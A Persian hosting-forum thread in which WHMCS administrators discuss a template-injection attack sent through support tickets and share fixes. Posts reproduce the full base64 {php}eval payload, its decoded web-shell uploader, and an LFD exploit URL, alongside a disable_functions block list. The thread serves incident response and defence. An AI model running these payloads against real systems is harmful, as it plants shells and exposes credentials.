سلام الان دو روزه که از طریق یه تیکت هک میشم یه نفر میاد تو سایتم عضو میشه یه تیکت برام میفرسته که در موضوع تیکت یه کد php میزنه بعد راحت میاد داخل whm من جالبه بدونید whmcs من آخرین ورژن و با لایسنس هست کدشو الان ندارم چون یوزرشو حذف کردم تیکتشم حذف شد

به whmcs ریپورت بدید سریع

چه طوری ریپورت بدم؟
این کدی هست که داخل موضوع برام تیکت میکنه

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ q MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMT FiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2 IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm 1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0 p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG 1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2 VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYk dVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVH d2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZE JSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKC Jkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}

اگه این طوری باشه که ما نباید آخرین ورژن رو آپدیت کنیم . مشکل امنیتی داره

اینارو ولش یکی لینک ریپورت رو به من بده
این عربا دارن دونه دونه سایتهای ایرانی رو هک میکنن من اولیش نبودم آخریشم نیستم

---------- Post added at 11:34 AM ---------- Previous post was at 11:29 AM ----------

فایل شل رو درون
downloads/b0x.php
میریزه
الان کد رو دیکد کردم دیدم این فایل رو اجرا میکنه

با سلام
حضورتون عرض کنم کنه این مشکل مربوط به ورژن 5 نیست و در ورژن های پایینتر هم مشاهده شده
در حال بررسی هستیم

سلام الان دو روزه که از طریق یه تیکت هک میشم یه نفر میاد تو سایتم عضو میشه یه تیکت برام میفرسته که در موضوع تیکت یه کد php میزنه بعد راحت میاد داخل whm من جالبه بدونید whmcs من آخرین ورژن و با لایسنس هست کدشو الان ندارم چون یوزرشو حذف کردم تیکتشم حذف شد

چه جالب/واسه منم همین اتفاق افتاد اما چون باگ ها پچ شده بود هک نشدیم!

خب
و اما کار این آقای باهوش 6 ساله از Saudi Arabia Saudinet Saudi Telecom Company چیه ؟
ایشون اومدن با این کد یک آپلودر در مسیر templates_c به نام red.php رایت کردند
به این صورت :

$code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9In Bvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5h bWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvIC c8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0i NTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIG lkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlm KCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZi hAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRf RklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcG xvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNl IHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PG JyPic7IH0NCn0NCj8+");
$fo = fopen("templates_c/red.php","w");
fwrite($fo,$code);


و محتوی $code هم به این شکل هست

<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>

بنابراین ابتدا فایل red.php رو حذف کنید و سپس فایل های دیگر رو به جهت عدم وجود شل چک کنید
موفق باشید

تمام ورژن ها از این راه هک میشن هنوز هم پچ نشده . هر کی میگه هک نمیشیم بگه تا اطلاعات سایتش رو بهش بدم

خب
و اما کار این آقای باهوش 6 ساله از Saudi Arabia Saudinet Saudi Telecom Company چیه ؟
ایشون اومدن با این کد یک آپلودر در مسیر templates_c به نام red.php رایت کردند
به این صورت :

$code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9In Bvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5h bWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvIC c8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0i NTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIG lkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlm KCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZi hAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRf RklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcG xvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNl IHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PG JyPic7IH0NCn0NCj8+");
$fo = fopen("templates_c/red.php","w");
fwrite($fo,$code);


و محتوی $code هم به این شکل هست

<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>

بنابراین ابتدا فایل red.php رو حذف کنید و سپس فایل های دیگر رو به جهت عدم وجود شل چک کنید
موفق باشید


مطمئنی اگه این کار رو بکنیم دیگه هک نمیشیم؟

من ریپورت دادم به whmcs شما هم از بخش پشتیبانی پانل خودتون در whmcs این کارو بکنید که سریعتر پیگیری بکنن و پچ امنیتی ارائه بدن.

تمام ورژن ها از این راه هک میشن هنوز هم پچ نشده . هر کی میگه هک نمیشیم بگه تا اطلاعات سایتش رو بهش بدم

کسی نگفت هک نمی شیم
شما اگر امکان داره خصوصی با بنده تماس بگیرید

---------- Post added at 12:15 PM ---------- Previous post was at 12:13 PM ----------


مطمئنی اگه این کار رو بکنیم دیگه هک نمیشیم؟

نحوه نفوذ رو بنده شرح دادم
اگر پرمیشن بندی سرور درست باشه مشکلی پیش نمیاد
به هر حال پچ امنیتی رو باید از whmcs گرفت
موفق باشید

میگم اگه من نمیگفتم ایشالا همه میخواستن یه جوجه عرب هکشون کنه؟

---------- Post added at 12:19 PM ---------- Previous post was at 12:16 PM ----------

الان من چیکار کنم؟
موندم والا
میشه یه کاری کرد که نشه فایل php اینا آپلود بشه؟
یه فایل
htaccess
بسازسم و جلوی آپلود این فایلهارو بگیریم؟
یا سطح دسترسی بعضی پوشه هارو کم کنیم؟

یکی از بچه ها که همین الان در حال مشاهده این تاپیک هست الان همین روش هک رو روی سایت من پیاده کرد چون پرمیشنهای سایت من درست تنظیم شده نتونست کاری بکنه ولی آی پی اونو برداشتم بدم به مدیر وب هاستینگ تالک ببینیم کی بوده که این کارو انجام داده و خواسته به سایت من نفوذ کنه

چه جالب/واسه منم همین اتفاق افتاد اما چون باگ ها پچ شده بود هک نشدیم!

چه طوری پچ کردید؟

واسه بعضی از کودکان بد آموزی داشته احتمالا این تاپیک
دوست عزیز میشه پرمیسینگ رو به ما هم بفرمایید تا ما هم هک نشیم؟

همیشه باید این تو ذهنمون باشه که اسکریپت هایه این چنینی که با یه لایسنس ساده تهیه میشه راحت دست کاری میشه این اسکریپ های عمومی همیشه در خطر هستند .
برای این منظور شماها باید اینطوری در نظر بگیرید که آره این سیستم امن نیست و میشه راحت شل آپلود اجرا بشه . در این مواقع باید سرورهای شما امنیت بالایی داشته باشه که حتی اجازه ی آپلود و اجرا شدن هیچ نوع شل ( PHP - CGI - PErL ) رو به دوستانه نفوذی ندهد .
به همین منظور پیشنهاد میکنم از سگ های زبده و کار کشته روی سروراتون استفاده کنید تا خوب نگهبانی بدن و در مواقع ضروری پارس کنن .

همیشه باید این تو ذهنمون باشه که اسکریپت هایه این چنینی که با یه لایسنس ساده تهیه میشه راحت دست کاری میشه این اسکریپ های عمومی همیشه در خطر هستند .
برای این منظور شماها باید اینطوری در نظر بگیرید که آره این سیستم امن نیست و میشه راحت شل آپلود اجرا بشه . در این مواقع باید سرورهای شما امنیت بالایی داشته باشه که حتی اجازه ی آپلود و اجرا شدن هیچ نوع شل ( PHP - CGI - PErL ) رو به دوستانه نفوذی ندهد .
به همین منظور پیشنهاد میکنم از سگ های زبده و کار کشته روی سروراتون استفاده کنید تا خوب نگهبانی بدن و در مواقع ضروری پارس کنن .

:))
--------------
داخل فولدرهای downloads - template_c و ... با htaccess جلی اجرای فایل های php را بگیرید . (البته من خودم تست نکردم ببینم واسه سیستم مشکلی پیش میاد یا نه

نکته خیلی مهم : روی پوشه admin پسورد بزارید

کسی هست روی سایت من چک کنه اینو ؟
فکر کنم مشکل رو حل کردم

من همه این کارارو کردم
آقا همه سایت ها این مشکل رو دارم
الان یه سایت بزرگ رو رفتم تو آدرس
/downloads/b0x.php
حالا آدرس سایت بماند دیدم یه آپلودر خوشکل جلوم باز شد
موندم به خدا

i3server - پشتيباني (http://www.i3server.com)
یکی تست میکنه نتیجه رو به من خبر بده ؟

عجب گرفتاری شده
رو تمام پوه ها دسترسی
php رو بستم باز اون تیکت رو برای خودم فرستادم بعد از ارسال تیکت رفتم آدرس
http://***************.com/downloads/b0x.php
آپلودر اومد جلوم
حالا باید چه کار کنیم
اینجوری که دیگه همه هک میشیم
بچه ها یه راهی بدین
سایت های بزرگ هم همین مشکلو دارن
بزرگترین هاشم راحت هک میشن اینجوری

---------- Post added at 01:23 PM ---------- Previous post was at 01:21 PM ----------

نه مال شمارو تا این تیکت رو زدم این پیغامو داد
Hacking Attempt !
بگو چیکار کردی؟

i3server - پشتيباني (http://www.i3server.com)
یکی تست میکنه نتیجه رو به من خبر بده ؟

پیغام داد: Hacking Attempt !

چه طور این کار رو کردی؟

عجب گرفتاری شده
رو تمام پوه ها دسترسی
php رو بستم باز اون تیکت رو برای خودم فرستادم بعد از ارسال تیکت رفتم آدرس
http://***************.com/downloads/b0x.php
آپلودر اومد جلوم
حالا باید چه کار کنیم
اینجوری که دیگه همه هک میشیم
بچه ها یه راهی بدین
سایت های بزرگ هم همین مشکلو دارن
بزرگترین هاشم راحت هک میشن اینجوری

---------- Post added at 01:23 PM ---------- Previous post was at 01:21 PM ----------

نه مال شمارو تا این تیکت رو زدم این پیغامو داد
Hacking Attempt !
بگو چیکار کردی؟

دوست عزیز کدی که شما قرار دادید شلر رو در میسر template_c میریزه
شما بگید چه کاری می کنید که شلر رو میبینید تا بشه راهنمایی کرد

من یه تیکت میدم موضوع تیکت رو همون کد میزنم و میفرستم بعد از ارسال میرم به آدرس
http://mahale nasbe whmcs.com/downloads/b0x.php
بعد یه آپلودر میاد جلوم مثل عکس پیوست
3870

اون دوستی که مشکلو حل کرده به ما هم بگه ثواب داره

جدا از کاری که من کردم
شما با انتقال فولدر هایی که باید بهشون 777 بدین به خارج از public_html میتونید مشکل رو تا حد خیلی خیلی زیادی حل کنید
Further Security Steps - WHMCS Documentation (http://docs.whmcs.com/Further_Security_Steps)
سایت من قبل از این کاری که کردم هم بازم امکان نداشت هک بشه
چون دسترسی عمومی به فولدر هایی مثل template_c وجود نداشت

من یه تیکت میدم موضوع تیکت رو همون کد میزنم و میفرستم بعد از ارسال میرم به آدرس
http://mahale nasbe whmcs.com/downloads/b0x.php
بعد یه آپلودر میاد جلوم مثل عکس پیوست
http://www.webhostingtalk.ir/attachments/f177/3870-%D9%87%DA%A9-%D8%B4%D8%AF%D9%86-%D8%A7%D8%B2-%D8%B7%D8%B1%DB%8C%D9%82-whmcs5-untitled-jpg

اون دوستی که مشکلو حل کرده به ما هم بگه ثواب داره

همون کد ؟
قبل از فرستادن تیکت فایل رو حذف کردید ؟

بله حذف کرده بودم

---------- Post added at 01:38 PM ---------- Previous post was at 01:34 PM ----------

سطح دسترسی فایل downloads رو بردم رو 644 فعلا حل شده مشکل
دوست عزیز نشدا بگو چیکار میکنی بعد از ارسال تیکت این اخطار رو میده؟

کاری که من کردم به نظر خودم یه راه حل بچه گانه هست
خوب من لایسنس دارم و همه ی فایل ها کد شده هست پس من نمیتونشتم خود باگ رو فیکس کنم
پس اومدم توی فایل configuration.php که توی همه ی صفحات انکلود میشه همه ی $_REQUEST ها رو چک کردم
اگه توی هر کدومشون عبارت {php} وجود داشت جلوی ادامه برنامه رو گرفتم و عبارت Hacking Attempt ! رو چاپ کردم

به درخواست دوستان کد رو میذارم
اما به نظر خودم این راه حل درست نیست و موقت هست ! پس از ارائه پچ حتما پاکش کنید
کد زیر رو توی فایل configuration.php اضافه کنید


foreach ($_REQUEST as $value)
{
if(strpos(strtolower($value), "{php}") !== false)
die("Hacking Attempt !");
}

فکر کنم از طریق اچتی اکسس بشه کاری کرد که جلوی آپلود فایل روی یک فولدر گرفته بشه ! باز هم جست و جو می کنیم

rn4j1m1 (http://www.webhostingtalk.ir/member/1056/)
http://www.webhostingtalk.ir/images/statusicon/user-offline.png عزیز به نمونه از این کد نویسی رو بذارید تا ما طبق همون پیش بریم

پست قبلیم رو ویرایش کردم و کد رو گذاشتم

من این تاپیک رو به اکثر سایت های فروش هاست اطلاع دادم

فکر کنم از این طریق خیلی بهتر بشه جلوی نفوذ رو گرفت شما هم یک نگاهی بندازید
Restrict Access by IP

فکر کنم از این طریق خیلی بهتر بشه جلوی نفوذ رو گرفت شما هم یک نگاهی بندازید
Restrict Access by IP

بیشتر توضیح بده

من سطح دسترسی پوشه دانلود رو آوردم پایین مشکلم حل شده
البته دوستان بگن کم کردن این سطح دسترسی مشکلی ایجاد نمیکنه؟

فکر کنم از این طریق خیلی بهتر بشه جلوی نفوذ رو گرفت شما هم یک نگاهی بندازید
Restrict Access by IP


اگر سرور کانفیگ امنیتی شده باشه خطری تهدید نمی کنه
ممکنه روی هاست های اشتراکی اسکریت های زیادی باشن که داری باگ هستند مدیر سرور که نمی تونه تمامی باگ ها رو فیکس کنه
بهتره بیشتر روی امنیت سرور فو*** کنید
موفق باشید

از این طریق مسدود کردن آی پی روی پوشه ادمین هست و من خودم هنوزتست نکردم این هم متن آموزش


For added security, if your staff use fixed IP addresses, you can add even more protection to your admin area by restricting access to a specific set of IPs. This is done by creating a file with the name .htaccess within your WHMCS admin directory, with the following content:


order deny,allow allow from 12.34.5.67 allow from 98.76.54.32 deny from all

You can specify as many different allow from lines as you require. Or you can even allow entire IP subnet's by specifying just the first part of an IP, for example: "12.34.". This is called Htaccess IP Restriction.

دوستان عزیز
اون هکری که این کارو کرده به نظرم یه بچه بوده فقط !
چون اصلا نیازی به شل نیست
من بدون شل الان میتونم مثلا تمام دیتابیس رو پاک کنم
یا مثالا هر اینویسی رو دلم خواست بزنم پرداخت شده
یا مثلا تمامی عبارت های دیتابیس رو تغییر بدم به "hacked by ..."
این باگ خیلی خیلی خظرناک هست حتی اگه هکر موفق به آپلود شل نشه

بهترین راه اینه که اولا پرمیشن فایل configuration.php رو 444 بزارید.
دوما کد های زیر رو در فایل configuration.php بزارید:


$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";

به جای username، نام کاربری هاستتونو بزارید. و همچنین این سه تا فولدر رو از هاست خارج کنید و به مسیری که در بالا گفته شده منتقل کنید. کاهش دادن پرمیشن این سه تا فولدر راهگشا نیست و بعدا مشکلاتی رو ایجاد میکنه.

دوستان عزیز
اون هکری که این کارو کرده به نظرم یه بچه بوده فقط !
چون اصلا نیازی به شل نیست
من بدون شل الان میتونم مثلا تمام دیتابیس رو پاک کنم
یا مثالا هر اینویسی رو دلم خواست بزنم پرداخت شده
یا مثلا تمامی عبارت های دیتابیس رو تغییر بدم به "hacked by ..."
این باگ خیلی خیلی خظرناک هست حتی اگه هکر موفق به آپلود شل نشه

بله درسته ، چون دسترسی در حد اجرای کد php هست نیازی به شل نیست و همون طور که آقای نجیمی گفتند اجرای کامندهایی نظیر mysql ممکن است

ببخشید من متوجه نشدم منظور از نام کاربری سایت چیه ؟

از این طریق مسدود کردن آی پی روی پوشه ادمین هست و من خودم هنوزتست نکردم این هم متن آموزش


For added security, if your staff use fixed IP addresses, you can add even more protection to your admin area by restricting access to a specific set of IPs. This is done by creating a file with the name .htaccess within your WHMCS admin directory, with the following content:


order deny,allow allow from 12.34.5.67 allow from 98.76.54.32 deny from all

You can specify as many different allow from lines as you require. Or you can even allow entire IP subnet's by specifying just the first part of an IP, for example: "12.34.". This is called Htaccess IP Restriction.

دوست عزیز باگ دستزسی اجرای php میده و اصلا به ادمین مربوط نیست
موفق باشید

همیشه باید این تو ذهنمون باشه که اسکریپت هایه این چنینی که با یه لایسنس ساده تهیه میشه راحت دست کاری میشه این اسکریپ های عمومی همیشه در خطر هستند .
برای این منظور شماها باید اینطوری در نظر بگیرید که آره این سیستم امن نیست و میشه راحت شل آپلود اجرا بشه . در این مواقع باید سرورهای شما امنیت بالایی داشته باشه که حتی اجازه ی آپلود و اجرا شدن هیچ نوع شل ( php - cgi - perl ) رو به دوستانه نفوذی ندهد .
به همین منظور پیشنهاد میکنم از سگ های زبده و کار کشته روی سروراتون استفاده کنید تا خوب نگهبانی بدن و در مواقع ضروری پارس کنن .

این یعنی چی خب ؟ تکلیف شد ؟ سگ با شناسنامه لزاریم دم در سایت ؟ اونی که نصفه شب وارد میشه که پاچشو میگیره ؟=d>
این امنیت که گفتین از قسمت خود سرور میشه کاری کرد که رو سایت چیزی آپ نشه / ؟

فعلا حرص نخورید دسترسی پوشه دانلود رو بیارید پایین حله

---------- Post added at 02:36 PM ---------- Previous post was at 02:32 PM ----------


بهترین راه اینه که اولا پرمیشن فایل configuration.php رو 444 بزارید.
دوما کد های زیر رو در فایل configuration.php بزارید:

کد PHP:
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";


به جای username، نام کاربری هاستتونو بزارید. و همچنین این سه تا فولدر رو از هاست خارج کنید و به مسیری که در بالا گفته شده منتقل کنید. کاهش دادن پرمیشن این سه تا فولدر راهگشا نیست و بعدا مشکلاتی رو ایجاد میکنه.

چرا آدمو میترسونید؟
چیکار کنیم؟
یه راه حل صحیح و ویژه بدین

فعلا حرص نخورید دسترسی پوشه دانلود رو بیارید پایین حله

---------- Post added at 02:36 PM ---------- Previous post was at 02:32 PM ----------



چرا آدمو میترسونید؟
چیکار کنیم؟
یه راه حل صحیح و ویژه بدین

دسترسی پوشه دانلود رو بیارید پایین ممکنه بعدا مشکل ایجاد کنه. البته به شرطی که فایلی برای دانلود بخواید بزارید. گرنه مشکلی نیست.
نام کاربری سایت نه، نام کاربری هاست. البته بستگی داره به اینکه هاست شما کنترل پنلش چی باشه. اگه سی پنل باشه با یه یوزری وارد سی پنل میشید. به این میگن یوزر هاست که معمولا 8 حرف اول اسم دامنتون هست. فولدرها رو بیارید قبل از public_html و توی فایل configuration.php هم اینایی که گفتمو بزارید.
این راه حلی بوده که سالها پیش خود whmcs پیشنهاد کرده.

تا ما اومدیم یه پورتال بزنیم اینم هک شد . . .

حالا خوبه که معرفی نکردیم :دی

بهترین راه اینه که اولا پرمیشن فایل configuration.php رو 444 بزارید.
دوما کد های زیر رو در فایل configuration.php بزارید:


$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";

به جای username، نام کاربری هاستتونو بزارید. و همچنین این سه تا فولدر رو از هاست خارج کنید و به مسیری که در بالا گفته شده منتقل کنید. کاهش دادن پرمیشن این سه تا فولدر راهگشا نیست و بعدا مشکلاتی رو ایجاد میکنه.



البته باز هم دوستان برنامه نویس روی این مسئله کار کنن که آیا این کار دقیقا جلوی این باگ رو میگیره یا نه؟

یکی از بچه ها که همین الان در حال مشاهده این تاپیک هست الان همین روش هک رو روی سایت من پیاده کرد چون پرمیشنهای سایت من درست تنظیم شده نتونست کاری بکنه ولی آی پی اونو برداشتم بدم به مدیر وب هاستینگ تالک ببینیم کی بوده که این کارو انجام داده و خواسته به سایت من نفوذ کنه

همین کار با ما هم انجام شده
آی پی کاربری که اینکارو کرده اینه :

2.176.***.124

البته ما تیکت هایی که عنوان مناسب نداشته باشن رو نخونده پاک می کنیم اینم یکی از همون موارد ...

با تشکر از همه دوستان که تو این تاپیک شرکت کردن و ما رو راهنمایی کردن ، همچنین از استارتر بابت اطلاع رسانی ...

دوستانی که هک شدند قبلش باگ امنیتی که در سطح بالا بود و Patch شد را انجام دادند ؟
لینک : Security Patch - WHMCS Forums (http://forum.whmcs.com/showthread.php?t=43462)

من دو روز پیش یک ایپی که مربوط به اسرائیل بود همین حمله را روی من پیاده کرد وهیچ اتفاقی رخ نداد !
و نوشته های دوستان هم خواندم ! نه داخل downloads چیزی بود نه داخل templates/c چیز غیر عادی بود !

به هر حال اگر باگ حساس و جدید بود حتما اطلاع رسانی کنید.
از اطلاع رسانی که کردید متشکرم

این باگ ربطی به باگ قبل نداره این یه آپلودر میسازه تو آدرسی که گفتم

دوستانی که هک شدند قبلش باگ امنیتی که در سطح بالا بود و Patch شد را انجام دادند ؟
لینک : Security Patch - WHMCS Forums (http://forum.whmcs.com/showthread.php?t=43462)

من دو روز پیش یک ایپی که مربوط به اسرائیل بود همین حمله را روی من پیاده کرد وهیچ اتفاقی رخ نداد !
و نوشته های دوستان هم خواندم ! نه داخل downloads چیزی بود نه داخل templates/c چیز غیر عادی بود !

به هر حال اگر باگ حساس و جدید بود حتما اطلاع رسانی کنید.
از اطلاع رسانی که کردید متشکرم

من روی سایت شما تست کردم
ظاهرا مشکلی نیست
من خودم اون رو نصب کرده بودم و مشکلی نداشتم تاحالا
دوستانی که مشکل دارن پس از نصب اون پچ ببینن مشکل همچنان باقی هست یا خیر

من روی سایت شما تست کردم
ظاهرا مشکلی نیست
من خودم اون رو نصب کرده بودم و مشکلی نداشتم تاحالا
دوستانی که مشکل دارن پس از نصب اون پچ ببینن مشکل همچنان باقی هست یا خیر

همین طور است !
این باگ یک هفته است شناسایی شده است و Patch ان اول دسامبر برای دانلود قرار داده شده است !
باید فایل Function.php ابدیت کنند ...

---------- Post added at 04:25 PM ---------- Previous post was at 04:23 PM ----------


این باگ ربطی به باگ قبل نداره این یه آپلودر میسازه تو آدرسی که گفتم

شما از روی کدام سند گفتید که این همان باک رفع شده نیست ؟

چون من این پچ رو ریختم همچنین چند سایت دیگه ای که میشناسم اما هک شدیم

چون من این پچ رو ریختم همچنین چند سایت دیگه ای که میشناسم اما هک شدیم

یعنی شما قبل از هک شدن Patch را نصب کردید اما هک شدید ؟ :-?

آره به خدا
همون اوایل که اومده بود ریختم

مگه این پچو نمیگید؟

اینو تو قسمتی که hmcs نصب بود ریختم و از زیپ خارج کردم

سلام .
دلیل نمیشه ممکنه قبل از این که پچ رو ریخته باشید یکی به اطلاعاتتون نفوذ کرده باشه و بعد از ریختن پچ ، تغییرات انجام بده.

بهترین راه اینکه فعلا تحویل فوری هاست رو به کاربر متوقف کنیم .
طوری که اطلاعات صحیحی از whm سرور داخل whmcs نباشه .

این کد بردارید الان هر بچه ای فکر میکنه هکر شده.

الان تو سایت ماهم تیکت زدن: 188.158.211.136

دوستان عزیز اون کاری که گفتم (توی صفحه 3) اگه انجام بدین 100 درصد مشکل حل میشه موقتا (اگه مشکلی وجود داشته باشه) و دیگه نیازی نیست نگران چیزی باشید تا وضعیت کاملا مشخص بشه

برای دوستان این مراحل امنیتی انجام بدید مهم نیست چه نسخه ای دارید یا پچ ریختین برای اطمینان خاطر انجام بدین:
گسترش دهندگان وب ونون - مرکز آموزش - ارتقا امنیت whmcs و قالب!!! (http://client.venon.ir/knowledgebase/10/--whmcs--.html)

و نکته ای دیگه حتما سروری که روش whmcs نصب می کنید حداکثر امنیت رعایت کنید، تمام فانکشن های اضافی ببندید و mod_sec کامل کانفیگ کنید حتی اگر شل هم اپلود شد به مشکلی بر نمیخورین.

مگه این پچو نمیگید؟

اینو تو قسمتی که hmcs نصب بود ریختم و از زیپ خارج کردم

اگر دقیقا این کارو کردید خب اشتباه بوده. چون باید توی پوشه includes اکسترکت می کردید. یه فایل دیگه با همین نام در این پوشه قرار داره که باید replace بشه.

اگر دقیقا این کارو کردید خب اشتباه بوده. چون باید توی پوشه includes اکسترکت می کردید. یه فایل دیگه با همین نام در این پوشه قرار داره که باید replace بشه.

دقیقا همین طور است !

سلام
چند روز پیشم همین عربه به منم تیکت زده بود ولی کاری نتونست بکنه

من از این دیسیبل فانکشن در PHP استفاده میکنند شاید به درد دوستان هم بخوره
disable_functions



apache_get_modules,apache_get_version,apache_reset _timeout,apache_getenv,apache_note,apache_setenv,g zinflate,chmod,symlink,./,fpassthru,crack_check,crack_closedict,crack_getla stmessage,crack_opendict,php_ini_scanned_files,she ll-exec,dl,ctrl_dir,phpini,tmp,safe_mode,php_uname,sy stemroot,server_software,get_current_user,HTTP_HOS T,ini_restore,popen,pclose,exec,shell_exec,suExec, passthru,proc_open,proc_nice,proc_terminate,proc_g et_status,proc_close,leak,apache_child_terminate,p osix_kill,posix_mkfifo,posix_setpgid,posix_setsid, posix_setuid,escapeshellcmd,escapeshellarg,posix_c termid,posix_getcwd,posix_getegid,posix_geteuid,po six_getgid,posix_getgrgid,posix_getgrnam,posix_get groups,posix_getlogin,posix_getpgid,posix_getpgrp, posix_getpid,posix_getppid,posix_getpwnam,posix_ge tpwuid,posix_getrlimit,posix_getsid,posix_getuid,p osix_isatty,posix_setegid,posix_seteuid,posix_setg id,posix_times,posix_ttyname,posix_uname,posix_acc ess,posix_get_last_error,posix_mknod,posix_strerro r,posix_initgroups,posix_setsid,posix_setuid,perl, rsync,wget,python,whoami,cat,perm,find,bind_shell, socket_bind,socet_connect,show_source,phpinfo,allo w_url_fopen

مکان هایی که با این دستور می تونیدمحل آپلودر شل رو پیدا کنید :
downloads/b0x.php
/templates_c/red.php


در کل فعلا 2 تا باگ شناسایی شده اولی :
/cart.php?a=test&templatefile=../../../configuration.php%00

که پچ ارائه شده رفع می شه ولی دومی فعلا اقدامی صورت نگرفته یا صورت نمیگیره اگر کانفیگ سرور و پرمیشن ها به درستی صورت بگیرد مشکلی پیش نمیاد

دومی هم اون بالا اشاره شد

همون پچ امنیتی که هفته پیش توی خبرنامه WHMCS منتشر شد برای این مشکل بوده؛ پاسخ تیکت منو الان داد WHMCS.com

WHMCS

Hi,
Please ensure you have applied the security patch we emailed you about at the start of the month: Security Patch - WHMCS Forums (http://forum.whmcs.com/showthread.php?t=43462)

If we can be of any more assistance, please don't hesitate to get back in contact.

Regards,
John

دوستانی که اینجا هستند توجه کنید که این باگ رو من 2 بار تو wht تاپیک زدم که یکی از مدیرهای این انجمن که اصلا احساس مسئولیت حالیش نست پاک کرده بود و برای بار دوم برای اطلاع رسانی تاپیک رو باز کردم اگه همون پچی که whmcs داده رو بزارید ردیفه.
http://www.webhostingtalk.ir/f176/35791/post329712/?highlight=#post329712

دوستان اگر موضع گیری نمیکنیدبنده از مدیران تیم بلک هت (http://www.black-hg.org/cc/) هستم با نام 3H34N
باگ اولی

cart.php?a=test&templatefile=../../../configuration.php%00
که دوستمون فرمودن باگ LFD هست Local File Disclosure که میشه با تعریف صحیح متغییر اونو رفع کرد.
اما باگ دوم رو ندیدم اما طبق گفته ی دوستان باگ فایل جرا میکنه حالا این کدی که شما اینجا دادین به صورت base64 کد کرده طرف و اونو روی سایت شما اجرا میکنه بعضی ها پیشنهاد دادن که پرمیژن فلان پوشه ها رو ببندیم اما بدونید که این کد رو میشه طوری دیگه هم تعریف کرد که پوشه دیگه رو مورد هدف قرار بده بهترین کار ابتدا پرمیژن بندی پوشه ها و فایل ها در کمترین سطح دسترسی در حد اجرا برای جلوگیری از اپلود هر گونه فایل مخرب و همچنین روشن کردن safe mode سرور برای جلو گیری از اجرای دستورات
